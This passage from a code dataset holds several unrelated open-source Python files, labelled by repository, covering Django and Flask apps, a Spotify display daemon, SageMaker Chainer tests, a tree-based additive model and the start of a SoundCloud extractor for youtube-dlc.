formatted_options.append(option_text +
padding +
self._chldren_indicator)
else:
formatted_options.append(option_text)
return sorted(formatted_options)
@staticmethod
def _get_children(option_children):
return [child for child in option_children.keys() if child]
@staticmethod
def _get_max_option_length(options):
return max([len(x) for x in options])
def _get_options_list(self):
page = self._model
for crumb in self.bread_crumbs:
if crumb not in page.keys():
raise ValueError(str(self.bread_crumbs) +
' : path traversal failed at ' +
str(crumb))
else:
page = page[crumb]
return page
@staticmethod
def _get_padding_amount(options, index):
option = options[index]
pad_to_length = SelectorViewModel._get_max_option_length(options) + 1
return pad_to_length - len(option)
@staticmethod
def _get_padding(options, index):
return ' ' * SelectorViewModel._get_padding_amount(options, index)
```
|
{
"source": "Jester4Hire/mysite",
"score": 2
}
|
#### File: mysite/blog/views.py
```python
from django.views import generic
from django.utils import timezone
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from .models import Post
from .forms import CommentForm
from django.shortcuts import render, get_object_or_404
class PostList(generic.ListView):
queryset = Post.objects.filter(status=1).order_by('-created_on')
template_name = 'index.html'
paginate_by = 3
def PostList(request):
object_list = Post.objects.filter(status=1).order_by('-created_on')
paginator = Paginator(object_list, 3)
page = request.GET.get('page')
try:
post_list = paginator.page(page)
except PageNotAnInteger:
post_list = paginator.page(1)
except EmptyPage:
post_list = paginator.page(paginator.num_pages)
return render(request, 'index.html', {'page': page, 'post_list': post_list})
class PostDetail(generic.DetailView):
model = Post
template_name = 'post_detail.html'
def post_detail(request, slug):
template_name = 'post_detail.html'
post = get_object_or_404(Post, slug=slug)
comments = post.comments.filter(active=True)
new_comment = None
if request.method == 'POST':
comment_form = CommentForm(data=request.POST)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.post = post
new_comment.save()
else:
comment_form = CommentForm()
return render(request, template_name, {'post': post,
'comments': comments,
'new_comment': new_comment,
'comment_form': comment_form})
```
|
{
"source": "Jesterboxboy/mahjong-portal",
"score": 2
}
|
#### File: management/commands/prepare_fixed_seating.py
```python
import json
import random
from django.core.management.base import BaseCommand
from online.team_seating import TeamSeating
from tournament.models import Tournament
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument("tournament_id", type=int)
def handle(self, *args, **options):
tournament_id = options["tournament_id"]
tournament = Tournament.objects.get(id=tournament_id)
assert tournament.tournament_type == Tournament.ONLINE
registrations = tournament.online_tournament_registrations.all()
pantheon_id_map = {}
for i, item in enumerate(registrations):
assert item.player.pantheon_id
pantheon_id_map[i + 1] = item.player.pantheon_id
with open(TeamSeating.initial_seating, "r") as f:
initial_seating = f.read()
rounds_text = initial_seating.splitlines()
rounds = []
for r in rounds_text:
seating = []
tables_text = r.split()
for t in tables_text:
players_ids = list(set([int(x) for x in t.split("-")]))
assert len(players_ids) == 4
random.shuffle(players_ids)
seating.append([pantheon_id_map[x] for x in players_ids])
rounds.append(seating)
data = {"seating": rounds}
with open(TeamSeating.processed_seating, "w") as f:
f.write(json.dumps(data))
print("Seating was saved to {}".format(TeamSeating.processed_seating))
# from player.models import Player
# from django.utils.translation import activate
# activate('ru')
# for i, round_item in enumerate(rounds):
# print(f'\nХанчан {i + 1}\n')
# for j, table in enumerate(round_item):
# print(f"Стол {j + 1}")
# print(', '.join([Player.objects.get(pantheon_id=x).full_name for x in table]))
```
#### File: management/commands/add_tenhou_account.py
```python
from django.core.management.base import BaseCommand
from django.utils import timezone
from player.models import Player
from player.tenhou.models import TenhouNickname
from utils.tenhou.helper import (
download_all_games_from_nodochi,
recalculate_tenhou_statistics_for_four_players,
save_played_games,
)
def get_date_string():
return timezone.now().strftime("%H:%M:%S")
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument("player_name", type=str)
parser.add_argument("tenhou_nickname", type=str)
def handle(self, *args, **options):
print("{0}: Start".format(get_date_string()))
temp = options.get("player_name").split(" ")
last_name = temp[0]
first_name = temp[1]
player = Player.objects.get(first_name_ru=first_name, last_name_ru=last_name)
tenhou_nickname = options.get("tenhou_nickname")
player_games, account_start_date, four_players_rate = download_all_games_from_nodochi(tenhou_nickname)
if not player_games:
print("Not correct account")
return
is_main = TenhouNickname.objects.filter(player=player, is_active=True).count() == 0
tenhou_object = TenhouNickname.objects.create(
is_main=is_main, player=player, tenhou_username=tenhou_nickname, username_created_at=account_start_date
)
save_played_games(tenhou_object, player_games)
recalculate_tenhou_statistics_for_four_players(tenhou_object, player_games, four_players_rate)
print("{0}: End".format(get_date_string()))
```
#### File: rating/calculation/common.py
```python
from datetime import timedelta
from dateutil.relativedelta import relativedelta
class RatingDatesMixin:
def get_date(self, rating_date):
# two years ago
return rating_date - timedelta(days=365 * 2)
def tournament_age(self, end_date, rating_date):
"""
Check about page for detailed description
"""
diff = relativedelta(rating_date, end_date)
part = (1 / 7) * 100
if diff.years < 1:
return 100
elif 1 <= diff.years < 2:
value = int(diff.months / 2 + 1)
return round(100 - (value * part), 2)
else:
return 0
```
|
{
"source": "jesterchen/jWeight",
"score": 3
}
|
#### File: jWeight/app/forms.py
```python
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.fields.html5 import DecimalField, DateField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, \
Optional
from app.models import User
from datetime import date
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
password2 = PasswordField(
'<PASSWORD> Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Register')
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user is not None:
raise ValidationError('Please use a different username.')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user is not None:
raise ValidationError('Please use a different email address.')
class MeasurementForm(FlaskForm):
date = DateField('Messdatum', validators=[DataRequired()],
default=date.today)
weight = DecimalField('Gewicht [kg]')
bmi = DecimalField('BMI', validators=[Optional()])
body_Fat = DecimalField('Koerperfett [%]', validators=[Optional()])
muscle = DecimalField('Muskelmasse [%]', validators=[Optional()])
rm_kcal = DecimalField('Grundumsatz [kcal]', validators=[Optional()])
visceral_fat = DecimalField('Viszeralfett', validators=[Optional()])
circumference = DecimalField('Bauchumfang [cm]', validators=[Optional()])
submit = SubmitField('Speichern', validators=[Optional()])
```
|
{
"source": "Jestergum/pidi-spotify",
"score": 3
}
|
#### File: pidi-spotify/pidi_spotify/__init__.py
```python
import logging
import signal
import sys
import time
from pathlib import Path
from threading import Thread
import configargparse
import requests
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
from . import hook
from .fifo import FIFO
from .st7789 import DisplayST7789
__version__ = "0.0.1"
FIFO_NAME = "/tmp/pidi-spotify.fifo"
CACHE_DIR = "/tmp/pidi-spotify-cache/"
LOG_FILE = "/tmp/pidi-spotify.log"
CONF_FILE = "/etc/default/pidi-spotify"
running = False
class State:
def __init__(self):
self.running = True
self.started = 0
self.duration_ms = 0
self.position_ms = 0
# Arguments listed in order for update_overlay
self.shuffle = False
self.repeat = False
self.state = "play"
self.volume = 100
# self.progress = attribute
self.elapsed = 0
self.album_name = ""
self.artist_name = ""
self.track_name = ""
self._index = 0
@property
def progress(self):
elapsed_ms = (time.time() - self.started) * 1000
try:
return (self.position_ms + elapsed_ms) / self.duration_ms
except ZeroDivisionError:
return 0
def __iter__(self):
self._index = 0
return self
def __next__(self):
try:
result = [
self.shuffle,
self.repeat,
self.state,
self.volume,
self.progress,
self.elapsed,
self.album_name,
self.artist_name,
self.track_name,
][self._index]
self._index += 1
return result
except IndexError:
raise StopIteration
def command_volume(volume):
state.volume = int(volume)
def command_seek(position_ms):
try:
state.position_ms = int(position_ms)
except ValueError:
state.position_ms = 0
state.started = time.time()
def command_pause(track_id):
state.state = "pause"
def command_play(track_id):
state.state = "play"
def command_track(track_id, position_ms):
track = spotify.track(track_id)
image_url = None
album_id = track["album"]["id"]
state.duration_ms = int(track["duration_ms"])
command_seek(position_ms)
state.state = "play"
state.album_name = track["album"]["name"]
state.artist_name = track["album"]["artists"][0]["name"]
state.track_name = track["name"]
for image in track["album"]["images"]:
if image["height"] == 300:
image_url = image["url"]
image_cache_path = image_cache_dir / f"{album_id}.png"
if not image_cache_path.is_file():
logger.info("Fetching image for {state.album_name} ({album_id})")
image = requests.get(image_url)
with open(image_cache_path, "wb+") as f:
f.write(image.content)
display.update_album_art(image_cache_path)
def display_update():
while state.running:
display.update_overlay(*state)
display.redraw()
time.sleep(1.0 / args.fps)
def signal_handler(sig, frame):
state.running = False
def main():
global spotify, state, display, logger, image_cache_dir, args # TODO This is horrid, encapsulate in a class?
parser = configargparse.ArgParser(default_config_files=[CONF_FILE])
parser.add_argument("--fifo-name", default=FIFO_NAME, type=str)
parser.add_argument("--cache-dir", default=CACHE_DIR, type=str)
parser.add_argument("--log-file", default=LOG_FILE, type=str)
parser.add_argument("--fps", default=15, type=int)
parser.add_argument("--hook", default=False, action="store_true")
parser.add_argument("--client-id", default=None, type=str)
parser.add_argument("--client-secret", default=None, type=str)
DisplayST7789.add_args(parser)
args = parser.parse_args()
args.size = 240
if args.hook:
sys.exit(hook.main(args))
logger = logging.getLogger("pidi_spotify")
log_fh = logging.FileHandler(args.log_file)
log_fh.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
logger.addHandler(log_fh)
logger.setLevel(logging.WARNING)
fifo = FIFO(args.fifo_name)
display = DisplayST7789(args)
image_cache_dir = Path(args.cache_dir)
image_cache_dir.mkdir(exist_ok=True)
if args.client_id is not None and args.client_secret is not None:
auth_manager = SpotifyClientCredentials(client_id=args.client_id, client_secret=args.client_secret)
else:
auth_manager = SpotifyClientCredentials()
spotify = spotipy.Spotify(auth_manager=auth_manager)
state = State()
signal.signal(signal.SIGINT, signal_handler)
_t_display_update = Thread(target=display_update)
_t_display_update.start()
print(
f"""PiDi Spotify Running
Listening on FIFO: {args.fifo_name}
Image cache dir: {args.cache_dir}
Log file: {args.log_file}
Press Ctrl+C to exit
"""
)
with fifo as fifo:
while state.running:
command = fifo.read()
if command is None or len(command) == 0:
time.sleep(0.1)
continue
command = command.split(":")
command_args = command[1:]
command_fn = command[0]
try:
globals()[f"command_{command_fn}"](*command_args)
logger.info(f"Command {command_fn} args: {','.join(command_args)}")
except KeyError:
logger.error(f"Unrecognised command {command_fn}")
state.running = False
_t_display_update.join()
return 0
if __name__ == "__main__":
sys.exit(main())
```
|
{
"source": "jesterhazy/sagemaker-chainer-container",
"score": 2
}
|
#### File: integration/local/test_mnist.py
```python
from __future__ import absolute_import
import os
import numpy as np
import pytest
from sagemaker.chainer import Chainer
from sagemaker.predictor import csv_deserializer, csv_serializer, json_deserializer, json_serializer
from test.utils import test_utils
path = os.path.dirname(os.path.realpath(__file__))
mnist_path = os.path.join(path, '..', '..', 'resources', 'mnist')
data_dir = os.path.join(mnist_path, 'data')
role = 'unused/dummy-role'
def test_chainer_mnist_single_machine(docker_image, sagemaker_local_session, instance_type, tmpdir):
customer_script = 'single_machine_customer_script.py'
hyperparameters = {'batch-size': 10000, 'epochs': 1}
estimator = Chainer(entry_point=customer_script,
source_dir=mnist_path,
role=role,
image_name=docker_image,
train_instance_count=1,
train_instance_type=instance_type,
sagemaker_session=sagemaker_local_session,
hyperparameters=hyperparameters,
output_path='file://{}'.format(tmpdir))
estimator.fit({'train': 'file://{}'.format(os.path.join(data_dir, 'train')),
'test': 'file://{}'.format(os.path.join(data_dir, 'test'))})
success_files = {
'model': ['model.npz'],
'output': ['success', 'data/accuracy.png', 'data/cg.dot', 'data/log', 'data/loss.png'],
}
test_utils.files_exist(str(tmpdir), success_files)
request_data = np.zeros((100, 784), dtype='float32')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type)
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
csv_serializer, csv_deserializer, 'text/csv')
test_arrays = [np.zeros((100, 784), dtype='float32'),
np.zeros((100, 1, 28, 28), dtype='float32'),
np.zeros((100, 28, 28), dtype='float32')]
with test_utils.local_mode_lock():
try:
predictor = _json_predictor(estimator, instance_type)
for array in test_arrays:
response = predictor.predict(array)
assert len(response) == len(array)
finally:
predictor.delete_endpoint()
def test_chainer_mnist_custom_loop(docker_image, sagemaker_local_session, instance_type, tmpdir):
customer_script = 'single_machine_custom_loop.py'
hyperparameters = {'batch-size': 10000, 'epochs': 1}
estimator = Chainer(entry_point=customer_script,
source_dir=mnist_path,
role=role,
image_name=docker_image,
train_instance_count=1,
train_instance_type=instance_type,
sagemaker_session=sagemaker_local_session,
hyperparameters=hyperparameters,
output_path='file://{}'.format(tmpdir))
estimator.fit({'train': 'file://{}'.format(os.path.join(data_dir, 'train')),
'test': 'file://{}'.format(os.path.join(data_dir, 'test'))})
success_files = {
'model': ['model.npz'],
'output': ['success'],
}
test_utils.files_exist(str(tmpdir), success_files)
request_data = np.zeros((100, 784), dtype='float32')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type)
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
json_serializer, json_deserializer,
'application/json')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
csv_serializer, csv_deserializer, 'text/csv')
@pytest.mark.parametrize('customer_script',
['distributed_customer_script.py',
'distributed_customer_script_with_env_vars.py'])
def test_chainer_mnist_distributed(docker_image, sagemaker_local_session, instance_type,
customer_script, tmpdir):
if instance_type == 'local_gpu':
pytest.skip('Local Mode does not support distributed GPU training.')
# pure_nccl communicator hangs when only one gpu is available.
cluster_size = 2
hyperparameters = {'sagemaker_process_slots_per_host': 1,
'sagemaker_num_processes': cluster_size,
'batch-size': 10000,
'epochs': 1,
'communicator': 'hierarchical'}
estimator = Chainer(entry_point=customer_script,
source_dir=mnist_path,
role=role,
image_name=docker_image,
train_instance_count=cluster_size,
train_instance_type=instance_type,
sagemaker_session=sagemaker_local_session,
hyperparameters=hyperparameters,
output_path='file://{}'.format(tmpdir))
estimator.fit({'train': 'file://{}'.format(os.path.join(data_dir, 'train')),
'test': 'file://{}'.format(os.path.join(data_dir, 'test'))})
success_files = {
'model': ['model.npz'],
'output': ['success', 'data/accuracy.png', 'data/cg.dot', 'data/log', 'data/loss.png'],
}
test_utils.files_exist(str(tmpdir), success_files)
request_data = np.zeros((100, 784), dtype='float32')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type)
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
json_serializer, json_deserializer,
'application/json')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
csv_serializer, csv_deserializer, 'text/csv')
def _json_predictor(estimator, instance_type):
predictor = estimator.deploy(1, instance_type)
predictor.content_type = 'application/json'
predictor.serializer = json_serializer
predictor.accept = 'application/json'
predictor.deserializer = json_deserializer
return predictor
```
#### File: resources/mnist/distributed_customer_script.py
```python
from __future__ import print_function, absolute_import
import argparse
import logging
import os
import chainer
from chainer import serializers, training
from chainer.datasets import tuple_dataset
import chainer.functions as F
import chainer.links as L
from chainer.training import extensions
import chainermn
import numpy as np
import sagemaker_containers
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class MLP(chainer.Chain):
def __init__(self, n_units, n_out):
super(MLP, self).__init__()
with self.init_scope():
# the size of the inputs to each layer will be inferred
self.l1 = L.Linear(None, n_units) # n_in -> n_units
self.l2 = L.Linear(None, n_units) # n_units -> n_units
self.l3 = L.Linear(None, n_out) # n_units -> n_out
def __call__(self, x):
h1 = F.relu(self.l1(x))
h2 = F.relu(self.l2(h1))
return self.l3(h2)
def _preprocess_mnist(raw, withlabel, ndim, scale, image_dtype, label_dtype, rgb_format):
images = raw['x']
if ndim == 2:
images = images.reshape(-1, 28, 28)
elif ndim == 3:
images = images.reshape(-1, 1, 28, 28)
if rgb_format:
images = np.broadcast_to(images, (len(images), 3) + images.shape[2:])
elif ndim != 1:
raise ValueError('invalid ndim for MNIST dataset')
images = images.astype(image_dtype)
images *= scale / 255.
if withlabel:
labels = raw['y'].astype(label_dtype)
return tuple_dataset.TupleDataset(images, labels)
return images
if __name__ == '__main__':
env = sagemaker_containers.training_env()
parser = argparse.ArgumentParser()
# Data and model checkpoints directories
parser.add_argument('--epochs', type=int)
parser.add_argument('--batch-size', type=int)
parser.add_argument('--communicator', type=str, default='pure_nccl')
parser.add_argument('--frequency', type=int, default=20)
parser.add_argument('--units', type=int, default=1000)
parser.add_argument('--model-dir', type=str)
parser.add_argument('--output-data-dir', type=str, default=env.output_data_dir)
parser.add_argument('--host', type=str, default=env.current_host)
parser.add_argument('--num-gpus', type=int, default=env.num_gpus)
parser.add_argument('--train', type=str, default=env.channel_input_dirs['train'])
parser.add_argument('--test', type=str, default=env.channel_input_dirs['test'])
args = parser.parse_args()
train_file = np.load(os.path.join(args.train, 'train.npz'))
test_file = np.load(os.path.join(args.test, 'test.npz'))
logger.info('Current host: {}'.format(args.host))
communicator = 'naive' if args.num_gpus == 0 else args.communicator
comm = chainermn.create_communicator(communicator)
device = comm.intra_rank if args.num_gpus > 0 else -1
print('==========================================')
print('Using {} communicator'.format(comm))
print('Num unit: {}'.format(args.units))
print('Num Minibatch-size: {}'.format(args.batch_size))
print('Num epoch: {}'.format(args.epochs))
print('==========================================')
model = L.Classifier(MLP(args.units, 10))
if device >= 0:
chainer.cuda.get_device(device).use()
# Create a multi node optimizer from a standard Chainer optimizer.
optimizer = chainermn.create_multi_node_optimizer(
chainer.optimizers.Adam(), comm)
optimizer.setup(model)
train_file = np.load(os.path.join(args.train, 'train.npz'))
test_file = np.load(os.path.join(args.test, 'test.npz'))
preprocess_mnist_options = {
'withlabel': True,
'ndim': 1,
'scale': 1.,
'image_dtype': np.float32,
'label_dtype': np.int32,
'rgb_format': False
}
train_dataset = _preprocess_mnist(train_file, **preprocess_mnist_options)
test_dataset = _preprocess_mnist(test_file, **preprocess_mnist_options)
train_iter = chainer.iterators.SerialIterator(train_dataset, args.batch_size)
test_iter = chainer.iterators.SerialIterator(
test_dataset, args.batch_size, repeat=False, shuffle=False)
updater = training.StandardUpdater(train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (args.epochs, 'epoch'), out=args.output_data_dir)
# Create a multi node evaluator from a standard Chainer evaluator.
evaluator = extensions.Evaluator(test_iter, model, device=device)
evaluator = chainermn.create_multi_node_evaluator(evaluator, comm)
trainer.extend(evaluator)
# Some display and output extensions are necessary only for one worker.
# (Otherwise, there would just be repeated outputs.)
if comm.rank == 0:
if extensions.PlotReport.available():
trainer.extend(
extensions.PlotReport(
['main/loss', 'validation/main/loss'],
'epoch',
file_name='loss.png'))
trainer.extend(
extensions.PlotReport(
['main/accuracy', 'validation/main/accuracy'],
'epoch',
file_name='accuracy.png'))
trainer.extend(extensions.snapshot(), trigger=(args.frequency, 'epoch'))
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.LogReport())
trainer.extend(
extensions.PrintReport([
'epoch', 'main/loss', 'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time'
]))
trainer.extend(extensions.ProgressBar())
trainer.run()
# only save the model in the master node
if args.host == str(env.hosts[0]):
serializers.save_npz(os.path.join(env.model_dir, 'model.npz'), model)
def model_fn(model_dir):
model = L.Classifier(MLP(1000, 10))
serializers.load_npz(os.path.join(model_dir, 'model.npz'), model)
return model.predictor
```
|
{
"source": "jesterhui/interpretable_ml_description_chemisorption_alloys",
"score": 3
}
|
#### File: interpretable_ml_description_chemisorption_alloys/src/bst_bag_tree.py
```python
import itertools as it
import numpy as np
from sklearn.tree import DecisionTreeRegressor
class BoostedBaggedTreeGAM:
"""iGAM for inteliigible models.
Attributes:
model (dict): Dictionary containing constituent trees of model.
m_boost (int): Number of iterations for gradient boosting.
n_leaves (int): Number of leaves in each tree.
n_trees (int): Number of bagged trees for each shaping function.
"""
def __init__(self, m_boost, n_leaves=2, n_trees=100, pairwise=0):
"""
Args:
m_boost (int): Number of iterations for gradient boosting.
n_leaves (int): Number of leaves in each tree.
n_trees (int): Number of bagged trees for each shaping function.
pairwise(int): Numer of pairwise interactions to include.
"""
self.model = {}
self.pairwise = pairwise
self.pairwise_model = {}
self.pairwise_inds = {}
self.m_boost = m_boost
self.n_leaves = n_leaves
self.n_trees = n_trees
self.y_avg = None
def fit(self, x_train, y_train):
"""Train model.
Args:
x_train (obj): (n, d) NumPy array containing training input
samples.
y_train (obj): (n, 1) Numpy vector containing target values.
"""
self.y_avg = np.mean(y_train)
n_samples, d_features = x_train.shape
# build model dictionary
for j in range(d_features):
self.model[j] = []
# fill model dictionary with decision trees
for _ in range(self.m_boost):
for j in range(d_features):
bagged_trees = []
for _ in range(self.n_trees):
# bootstrap sampling
ind = np.random.randint(n_samples,
size=n_samples)
x_sample = x_train[ind, :]
# boosting
y_sample = (y_train[ind, :].reshape(-1, 1)
- self.predict(x_sample))
x_sample = x_train[ind, j].reshape(-1, 1)
f_j = DecisionTreeRegressor(max_leaf_nodes=self.n_leaves)
f_j.fit(x_sample, y_sample)
bagged_trees.append(f_j)
self.model[j].append(bagged_trees)
if self.pairwise > 0:
self.train_pairwise(x_train, y_train, self.pairwise)
def predict(self, x_pred):
"""Use learned model to label data.
Args:
x_pred (obj): (n, d) NumPy array of test samples.
Returns:
obj: (n, 1) NumPy vector containging predictions.
"""
# sum over model contributions for each feature
y_pred = self.y_avg
for j in self.model:
for m_iter in self.model[j]:
for f_j in m_iter:
y_pred = y_pred + (f_j.predict(x_pred[:, j].reshape(-1, 1))
.reshape(-1, 1) / self.n_trees)
for key in self.pairwise_inds:
x_pred_p = x_pred[:, self.pairwise_inds[key]]
for f_j in self.pairwise_model[key]:
y_pred = y_pred + (f_j.predict(x_pred_p)
.reshape(-1, 1) / self.n_trees)
return y_pred
def feature_contribution(self, x_feat, j_feat):
"""Obtain contribution of individual feature to overall prediction.
Args:
x_feat (type): Feature data.
j_feat (int): Index of feature.
Returns:
obj: (n, 1) NumPy vector containing feature contrbution.
"""
# peform prediction for single variable
y_feat = 0
for m_iter in self.model[j_feat]:
for f_j in m_iter:
y_feat = y_feat + (f_j.predict(x_feat[:, j_feat].reshape(-1, 1)
).reshape(-1, 1) / self.n_trees)
return y_feat
def pair_contribution(self, x_feat, j_pair):
"""Obtain contribution of individual feature to overall prediction.
Args:
x_feat (type): Feature data.
j_feat (int): Index of feature.
Returns:
obj: (n, 1) NumPy vector containing feature contrbution.
"""
# peform prediction for single variable
y_pair = 0
print(self.pairwise_inds[j_pair])
x_pred_p = x_feat[:, self.pairwise_inds[j_pair]]
for f_j in self.pairwise_model[j_pair]:
y_pair = y_pair + (f_j.predict(x_pred_p)
.reshape(-1, 1) / self.n_trees)
return y_pair
def get_weights(self, x_w):
"""Get feature weights of iGAM model.
Args:
x_w (obj): NumPy array containing samples used to estimate weights.
Returns:
obj: (n, ) NumPy vector containing weights.
"""
n_samples, n_features = x_w.shape
weights = np.zeros(n_features,)
for j in range(n_features):
f_x = self.feature_contribution(x_w, j)
weights[j] = np.sqrt((1 / n_samples) * np.sum(f_x ** 2))
return weights
def train_pairwise(self, x_train, y_train, n_pairs):
"""Train pairwise interactions.
Args:
x_train (obj): (n, d) NumPy array containing training input
samples.
y_train (obj): (n, 1) Numpy vector containing target values.
n_pairs (int): Numer of pairwise interactions to include.
"""
n_samples, d_features = x_train.shape
possible_pairs = list(it.combinations(range(d_features), 2))
weights = self.get_weights(x_train)
sorted_weights = np.argsort(np.flip(np.argsort(weights)))
ranking = []
for pair in possible_pairs:
ranking.append(sorted_weights[pair[0]] + sorted_weights[pair[1]])
ranking = np.asarray(ranking)
for i in range(n_pairs):
best = np.argsort(ranking)[i]
best = possible_pairs[best]
bagged_trees = []
for _ in range(self.n_trees):
# bootstrap sampling
ind = np.random.randint(n_samples,
size=n_samples)
x_sample = x_train[ind, :]
# boosting
y_sample = (y_train[ind, :].reshape(-1, 1)
- self.predict(x_sample))
x_sample = x_sample[:, best]
f_j = DecisionTreeRegressor(max_leaf_nodes=4)
f_j.fit(x_sample, y_sample)
bagged_trees.append(f_j)
self.pairwise_model[i] = bagged_trees
self.pairwise_inds[i] = best
```
|
{
"source": "jesterjunk/yt-dlc",
"score": 2
}
|
#### File: youtube_dlc/extractor/soundcloud.py
```python
from __future__ import unicode_literals
import itertools
import re
import json
import random
from .common import (
InfoExtractor,
SearchInfoExtractor
)
from ..compat import (
compat_HTTPError,
compat_kwargs,
compat_str,
compat_urlparse,
)
from ..utils import (
error_to_compat_str,
ExtractorError,
float_or_none,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
mimetype2ext,
str_or_none,
try_get,
unified_timestamp,
update_url_query,
url_or_none,
urlhandle_detect_ext,
sanitized_Request,
)
class SoundcloudEmbedIE(InfoExtractor):
_VALID_URL = r'https?://(?:w|player|p)\.soundcloud\.com/player/?.*?\burl=(?P<id>.+)'
_TEST = {
# from https://www.soundi.fi/uutiset/ennakkokuuntelussa-timo-kaukolammen-station-to-station-to-station-julkaisua-juhlitaan-tanaan-g-livelabissa/
'url': 'https://w.soundcloud.com/player/?visual=true&url=https%3A%2F%2Fapi.soundcloud.com%2Fplaylists%2F922213810&show_artwork=true&maxwidth=640&maxheight=960&dnt=1&secret_token=s-ziYey',
'only_matching': True,
}
@staticmethod
def _extract_urls(webpage):
return [m.group('url') for m in re.finditer(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?://)?(?:w\.)?soundcloud\.com/player.+?)\1',
webpage)]
def _real_extract(self, url):
query = compat_urlparse.parse_qs(
compat_urlparse.urlparse(url).query)
api_url = query['url'][0]
secret_token = query.get('secret_token')
if secret_token:
api_url = update_url_query(api_url, {'secret_token': secret_token[0]})
return self.url_result(api_url)
class SoundcloudIE(InfoExtractor):
"""Information extractor for soundcloud.com
To access the media, the uid of the song and a stream token
must be extracted from the page source and the script must make
a request to media.soundcloud.com/crossdomain.xml. Then
the media can be grabbed by requesting from an url composed
of the stream token and uid
"""
_VALID_URL = r'''(?x)^(?:https?://)?
(?:(?:(?:www\.|m\.)?soundcloud\.com/
(?!stations/track)
(?P<uploader>[\w\d-]+)/
(?!(?:tracks|albums|sets(?:/.+?)?|reposts|likes|spotlight)/?(?:$|[?#]))
(?P<title>[\w\d-]+)/?
(?P<token>[^?]+?)?(?:[?].*)?$)
|(?:api(?:-v2)?\.soundcloud\.com/tracks/(?P<track_id>\d+)
(?:/?\?secret_token=(?P<secret_token>[^&]+))?)
)
'''
IE_NAME = 'soundcloud'
_TESTS = [
{
'url': 'http://soundcloud.com/ethmusic/lostin-powers-she-so-heavy',
'md5': 'ebef0a451b909710ed1d7787dddbf0d7',
'info_dict': {
'id': '62986583',
'ext': 'mp3',
'title': 'Lostin Powers - She so Heavy (SneakPreview) Adrian Ackers Blueprint 1',
'description': 'No Downloads untill we record the finished version this weekend, i was too pumped n i had to post it , earl is prolly gonna b hella p.o\'d',
'uploader': 'E.T. ExTerrestrial Music',
'uploader_id': '1571244',
'timestamp': 1349920598,
'upload_date': '20121011',
'duration': 143.216,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
}
},
# geo-restricted
{
'url': 'https://soundcloud.com/the-concept-band/goldrushed-mastered?in=the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '47127627',
'ext': 'mp3',
'title': 'Goldrushed',
'description': 'From Stockholm Sweden\r\nPovel / Magnus / Filip / David\r\nwww.theroyalconcept.com',
'uploader': 'The Royal Concept',
'uploader_id': '9615865',
'timestamp': 1337635207,
'upload_date': '20120521',
'duration': 227.155,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link
{
'url': 'https://soundcloud.com/jaimemf/youtube-dlc-test-video-a-y-baw/s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link (alt format)
{
'url': 'https://api.soundcloud.com/tracks/123998367?secret_token=s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# downloadable song
{
'url': 'https://soundcloud.com/oddsamples/bus-brakes',
'md5': '7624f2351f8a3b2e7cd51522496e7631',
'info_dict': {
'id': '128590877',
'ext': 'mp3',
'title': 'Bus Brakes',
'description': 'md5:0053ca6396e8d2fd7b7e1595ef12ab66',
'uploader': 'oddsamples',
'uploader_id': '73680509',
'timestamp': 1389232924,
'upload_date': '20140109',
'duration': 17.346,
'license': 'cc-by-sa',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link, downloadable format
{
'url': 'https://soundcloud.com/oriuplift/uponly-238-no-talking-wav/s-AyZUd',
'md5': '64a60b16e617d41d0bef032b7f55441e',
'info_dict': {
'id': '340344461',
'ext': 'wav',
'title': 'Uplifting Only 238 [No Talking] (incl. Alex Feed Guestmix) (Aug 31, 2017) [wav]',
